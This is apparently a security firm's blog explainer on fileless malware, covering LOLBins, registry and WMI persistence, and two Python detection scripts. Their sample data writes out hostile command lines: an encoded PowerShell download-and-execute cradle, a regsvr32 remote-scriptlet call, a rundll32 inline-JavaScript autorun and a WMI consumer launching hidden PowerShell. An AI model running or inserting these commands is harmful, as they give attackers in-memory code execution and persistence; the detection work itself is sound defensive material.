
What is Fileless Malware?

  • Writer: Rolando Ramos
  • 3 days ago

Threat Type: Fileless Malware


Category: Malware-Based Threat


Cyber Threat Indicators


Fileless malware is malicious software that operates primarily within a computer's memory (RAM) using legitimate, built-in system tools to carry out its attacks.


It is called "fileless" because it avoids writing a malicious file or executable to the hard drive, which makes it hard to detect with traditional, signature-based antivirus that relies on scanning the file system for known malware signatures. The label is relative, though: the initial lure (a document with a macro, a script) and any persistence mechanism can still leave traces on disk or in the registry. What is missing is a standalone malicious executable for a scanner to hash.


Instead, fileless malware relies on abusing tools that are already present on the system and on exploiting vulnerabilities in installed software.


Core Characteristics


In-Memory Residence: The malicious payload runs directly in the computer's Random Access Memory (RAM). This means that if the system is rebooted, the malware is typically erased, though attackers often establish persistence mechanisms (like registry manipulation) to ensure the attack survives a reboot.


Living off the Land (LotL): This is the central tactic. The malware abuses legitimate, trusted, native operating system tools (known as LOLBins or Living Off the Land Binaries) to perform its malicious actions. Because these tools are trusted, their activity is less likely to be flagged as suspicious by security software.


Evasion of Traditional Antivirus: Since there is no malicious file to scan, signature-based detection (which looks for known file hashes or signatures) is ineffective, and the lack of a file-based Indicator of Compromise (IOC) lets the attack fly under the radar. It does not make the activity invisible: the commands and scripts still have to be interpreted, so command-line logging, PowerShell script block logging, and AMSI (which hands script content to the installed antivirus at execution time) can see them. Detection has to shift from file signatures to behavior.


Low-Observable Characteristics: By leveraging trusted processes and avoiding disk writes, the attack leaves a minimal footprint, complicating forensic analysis and increasing the time an attacker can remain undetected (dwell time).


Living off the Land (LotL) Tools


Attackers commonly use powerful, pre-installed Windows tools for malicious purposes:


PowerShell: This is one of the most popular tools, used to execute malicious scripts directly in memory, download additional payloads, or perform reconnaissance and lateral movement across the network.


Windows Management Instrumentation (WMI): Attackers use WMI to execute code remotely, to manage systems, and to gain persistence through permanent event subscriptions: an event filter (a WQL query, for example one that fires a few minutes after every boot) is bound to a consumer that runs a command line or script. All three objects live in the WMI repository rather than as files on disk.


Microsoft Office Macros (VBA): A malicious macro embedded in a Word or Excel document can execute a command (like launching PowerShell) once the user enables content, allowing the attack to begin in memory.


Regsvr32/Rundll32: These legitimate, signed Windows binaries are abused to execute code or DLLs. Regsvr32 can be pointed at a remote scriptlet (.sct) file through scrobj.dll, and rundll32 can evaluate inline JavaScript, so each gives the attacker code execution inside a trusted process without a dropped executable.
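The tools above all leave the same kind of trace: a trusted parent launching a trusted binary with unusual arguments. The script below is an added example (not code from the original article or from VIIEGO) of triaging process-creation events for those patterns. It works over constructed sample events whose fields are modelled on a Sysmon Event ID 1 record (parent image, image, command line); the parent/child pairs, argument regexes and the "example.invalid" URLs are assumptions chosen for illustration, and the regexes are heuristics rather than signatures. It also decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text) so that the real script, not the blob, is what gets inspected.

```python
"""Triage process-creation events for living-off-the-land abuse.

Added example over constructed events, not records from any real host."""
import base64
import re
from typing import Dict, List, Optional

# Microsoft Office hosts that should almost never spawn script interpreters or LOLBins.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Native binaries commonly abused to run code without dropping an executable.
LOLBINS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "cmd.exe", "wmic.exe", "certutil.exe"}

# Argument heuristics (assumptions, not signatures). Each regex is applied to the full
# command line and, when -EncodedCommand is present, to the decoded script as well.
PATTERNS = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("in-memory execution", re.compile(r"invoke-expression|\biex\b|frombase64string|reflection\.assembly", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy bypass", re.compile(r"-e(?:xecutionpolicy|p|xec)\s+bypass", re.I)),
    ("regsvr32 scriptlet", re.compile(r"regsvr32.*(?:scrobj\.dll|/i:https?:)", re.I)),
    ("rundll32 inline script", re.compile(r"rundll32.*javascript:", re.I)),
    ("wmic remote/XSL", re.compile(r"wmic.*(?:process\s+call\s+create|/format:)", re.I)),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Build the value PowerShell expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Reverse encode_command(); None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event: Dict[str, str]) -> List[str]:
    """Return findings for one process-creation event; an empty list means nothing stood out."""
    findings = []
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["cmdline"]

    if parent in OFFICE_PARENTS and image in LOLBINS:
        findings.append(f"office host {parent} spawned {image}")

    # Decode -EncodedCommand so the real script is scanned, not just the base64 blob.
    text = cmdline
    match = ENCODED_ARG.search(cmdline)
    if match:
        decoded = decode_command(match.group(1))
        if decoded is None:
            findings.append("encoded command that does not decode")
        else:
            findings.append("encoded command decodes to: " + decoded.strip())
            text += "\n" + decoded

    findings.extend(label for label, pattern in PATTERNS if pattern.search(text))
    return findings


# Constructed sample events, roughly the fields of a Sysmon Event ID 1 record.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_EVENTS = [
    {   # macro-launched PowerShell pulling a second stage straight into memory
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -enc " + encode_command(CRADLE),
    },
    {   # regsvr32 running a remote scriptlet through scrobj.dll (the "Squiblydoo" technique)
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\regsvr32.exe",
        "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
    },
    {   # routine admin script launched from the shell: should produce no findings
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["cmdline"][:60], "->", triage_event(event) or "clean")
```

The third event is there on purpose: a plain `-File` invocation from Explorer trips none of the heuristics, which is the bar any such rule has to clear before it goes into a detection pipeline. The parent/child check is the most durable signal of the three; argument regexes are cheap to evade with obfuscation, which is why the decoded script is scanned rather than the raw command line.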


Common Attack Tactics


Memory Injection: The malicious code is injected into the memory space of a legitimate, running process (e.g., a web browser or a system service) to hide its execution. Techniques include reflective loading, in which a DLL or .NET assembly is mapped into memory from a buffer, without the Windows loader ever reading it from disk.


Registry-Resident Malware: To achieve persistence (surviving a reboot), the attacker stores the malicious payload as an encrypted or obfuscated script in the Windows Registry and adds an autorun entry (for example under a Run key) that launches a small loader, typically a script host such as PowerShell or rundll32, which reads the stored value and executes it at every startup.


Exploit Kits: These toolkits leverage vulnerabilities in applications (like web browsers or plugins) to execute a shellcode payload directly in memory, which then kicks off the fileless infection chain.
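Both persistence mechanisms named on this page, the registry-resident payload above and the WMI event subscription under the LotL tools, can be hunted with the same idea: enumerate the objects an attacker must leave behind and flag the ones that carry executable content. The script below is an added example (not code from the original article or from VIIEGO) that does this over constructed data. The Run-key values and the root\subscription objects are invented for illustration; the WMI records use the field names of Sysmon's WmiEvent records (Class, Name, Query, CommandLineTemplate) as an assumed shape, and the first subscription is modelled on the SCM Event Log subscription that Windows ships by default, so that the checker has a benign entry to ignore.

```python
"""Hunt for fileless persistence: registry autorun values that carry a script
instead of pointing at a program, and WMI event subscriptions that run commands.

Added example over constructed records, not data from any real host."""
import re
from typing import Dict, List

# --- Registry-resident payloads ----------------------------------------------------
# An autorun that invokes a script host with inline code (rundll32 javascript:, mshta vbscript:).
INLINE_SCRIPT = re.compile(r"(?:rundll32|mshta)(?:\.exe)?\b.*\b(?:javascript|vbscript):", re.I)
# A long run of base64 characters: a stored payload rather than a path (heuristic threshold).
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def check_autorun(name: str, data: str) -> List[str]:
    """Findings for one Run-key value (name, data); empty list means it looks like a normal autorun."""
    findings = []
    if any(not ch.isprintable() for ch in name):
        findings.append("non-printable characters in value name (used to hide entries from registry editors)")
    if INLINE_SCRIPT.search(data):
        findings.append("launches a script host with inline script")
    if BASE64_BLOB.search(data):
        findings.append("carries a long base64-like blob instead of a program path")
    return findings


# --- WMI event subscriptions -------------------------------------------------------
# Consumer classes that execute attacker-controlled commands or scripts when a filter fires.
EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}


def check_wmi_subscriptions(records: List[Dict[str, str]]) -> List[str]:
    """Join each __FilterToConsumerBinding to its filter and consumer and report
    every binding whose consumer runs a command or script."""
    filters = {r["Name"]: r for r in records if r["Class"] == "__EventFilter"}
    consumers = {r["Name"]: r for r in records
                 if r["Class"] not in ("__EventFilter", "__FilterToConsumerBinding")}
    findings = []
    for binding in (r for r in records if r["Class"] == "__FilterToConsumerBinding"):
        consumer = consumers.get(binding["Consumer"])
        if consumer is None or consumer["Class"] not in EXECUTING_CONSUMERS:
            continue  # log-writing or dangling consumers are not a persistence path
        query = filters.get(binding["Filter"], {}).get("Query", "<unknown filter>")
        payload = consumer.get("CommandLineTemplate") or consumer.get("ScriptText", "")
        findings.append(f"{consumer['Class']} '{consumer['Name']}' runs [{payload}] when filter "
                        f"'{binding['Filter']}' fires: {query}")
    return findings


# Constructed Run-key values, as (value name, value data).
SAMPLE_AUTORUNS = [
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    # value name starting with a null byte; data makes rundll32 evaluate inline JavaScript
    ("\x00default", 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";eval("/*stage*/")'),
    ("Updater", "powershell.exe -w hidden -enc " + "QQ" * 80 + "=="),
]

# Constructed root\subscription objects in the shape of Sysmon WmiEvent records.
SAMPLE_WMI = [
    {"Class": "__EventFilter", "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Class": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
    {"Class": "__FilterToConsumerBinding", "Filter": "SCM Event Log Filter",
     "Consumer": "SCM Event Log Consumer"},
    # attacker-style persistence: a filter that fires a few minutes after every boot,
    # bound to a consumer that launches PowerShell against a registry-stored payload
    {"Class": "__EventFilter", "Name": "SysTimer",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"Class": "CommandLineEventConsumer", "Name": "SysUpdater",
     "CommandLineTemplate": r'powershell.exe -NoP -W Hidden -Command "IEX (Get-ItemProperty HKCU:\Software\Classes\Sys).Stage"'},
    {"Class": "__FilterToConsumerBinding", "Filter": "SysTimer", "Consumer": "SysUpdater"},
]

if __name__ == "__main__":
    for name, data in SAMPLE_AUTORUNS:
        print(repr(name), "->", check_autorun(name, data) or "ok")
    for line in check_wmi_subscriptions(SAMPLE_WMI):
        print("WMI:", line)
```

The WMI check deliberately keys on the consumer class rather than on the filter: a filter is only a trigger, and benign subscriptions (event-log consumers, for instance) use the same filter machinery. On a live host the same join is done over the three classes in the root\subscription namespace; the constructed records here stand in for that query so the logic can be run and tested offline.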


Notable Fileless Malware Examples


Poweliks: One of the earliest widely known Trojans that used the Windows Registry to store its payload and maintain persistence.


Duqu 2.0: A highly sophisticated espionage platform, discovered in 2015, that resided almost entirely in memory and relied on re-infecting hosts over the network rather than on on-disk persistence, which made it exceptionally stealthy.


Operation Cobalt Kitty: An advanced persistent threat (APT) campaign that heavily utilized PowerShell scripts for its fileless attack stages.


---


VIIEGO is a human security agency: research and consulting in identity manipulation and fraud prevention, decoding human behavior to secure your identity.


www.viiego.com | Protect What's Yours.
